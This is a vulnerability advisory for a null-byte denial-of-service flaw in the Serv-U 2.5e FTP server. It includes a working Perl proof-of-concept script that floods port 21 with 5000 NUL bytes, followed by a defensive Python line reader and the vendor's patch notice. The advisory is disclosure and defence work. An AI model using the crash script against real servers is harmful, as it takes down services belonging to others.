FTP Serv-U 2.5e Subject to Denial of Service


Reported August 7, 2000 by Blue Panda

VERSIONS AFFECTED
FTP Serv-U 2.5e

DESCRIPTION

The Serv-U FTP service can be made to generate stack faults by sending it approximately 5000 null bytes. Such an attack can leave the underlying operating system unstable, and the system may eventually crash.

DEMONSTRATION

#!/usr/bin/perl
#
# FTP Serv-U 2.5e denial-of-service
# Blue Panda - [email protected]
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
#

use IO::Socket;

$host = "ftp.host.com";
$port = "21";

print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

$counter = 0;
$buf = "";
while ($counter < 5000) {
    $buf .= "\x00";
    $counter += 1;
}
print $socket "$buf\n";

sleep(4);
close($socket);
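The defensive counterpart to the demonstration above is a control-channel reader that cannot be made to accumulate an unbounded buffer and that refuses bytes no FTP command can contain. The following is an added example for this advisory, not code from Serv-U or from Blue Panda; it assumes a 512-byte cap per control-channel line and outright rejection of NUL bytes (RFC 959 commands are short ASCII lines ending in CRLF), and the three captured sessions it is run over are constructed, with the second one shaped like the advisory's payload.

```python
import io

# Assumption (not from the advisory): a hard cap on one control-channel line.
# Real commands are a few dozen bytes; anything near the cap is abuse or garbage.
MAX_LINE_BYTES = 512


class ControlLineError(ValueError):
    """Raised when a control-channel line violates the reader's limits."""


def read_control_line(stream):
    """Read one CRLF-terminated FTP command from a binary stream, bounded in size.

    readline() is given a size limit of MAX_LINE_BYTES + 1, so a peer that never
    sends a line terminator, or pads a line with thousands of filler bytes, can
    never make the reader buffer more than that. Returns None at end of stream,
    the command bytes (without CRLF) on success, and raises ControlLineError on
    a NUL byte or an over-long line.
    """
    line = stream.readline(MAX_LINE_BYTES + 1)  # bounded read, never more than cap + 1 bytes
    if not line:
        return None  # peer closed the connection
    nul_count = line.count(b"\x00")
    if nul_count:
        # No valid FTP command contains NUL; reject before any parsing touches it.
        raise ControlLineError("%d NUL bytes in control channel" % nul_count)
    if len(line) > MAX_LINE_BYTES or not line.endswith(b"\n"):
        # Either the line is over the cap or the cap was hit without a terminator.
        raise ControlLineError("control line exceeds %d bytes" % MAX_LINE_BYTES)
    return line.rstrip(b"\r\n")


def triage(captured):
    """Replay a captured control-channel byte string through the bounded reader.

    Returns what a server using this reader would have seen: one "ACCEPT: ..."
    entry per command, then a single "REJECT: ..." entry at the first violation,
    where a real server would drop the connection instead of reading further.
    """
    stream = io.BytesIO(captured)
    seen = []
    while True:
        try:
            line = read_control_line(stream)
        except ControlLineError as exc:
            seen.append("REJECT: " + str(exc))
            return seen
        if line is None:
            return seen
        seen.append("ACCEPT: " + line.decode("ascii", "replace"))


# Constructed sample sessions (not real captures).
BENIGN_SESSION = b"USER anonymous\r\nPASS guest@\r\nQUIT\r\n"
NUL_FLOOD = b"\x00" * 5000 + b"\n"          # same shape as the advisory's payload
OVERLONG = b"RETR " + b"A" * 600 + b"\r\n"   # no NULs, but far past the line cap

if __name__ == "__main__":
    for name, data in (("benign", BENIGN_SESSION), ("nul flood", NUL_FLOOD), ("overlong", OVERLONG)):
        print(name)
        for entry in triage(data):
            print("  " + entry)
```

The NUL-flood session is cut off after the first 513 bytes read: the reader sees the NULs, rejects the line, and the remaining 4,000-odd bytes are never buffered. The over-long session shows the second limit doing its job independently of the NUL check, which matters because a stack fault from an unterminated line does not need NUL bytes to trigger it.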

VENDOR RESPONSE

The vendor, Deerfield, is aware of the problem and has released a patched version 2.5f.  

CREDIT
Discovered by Blue Panda
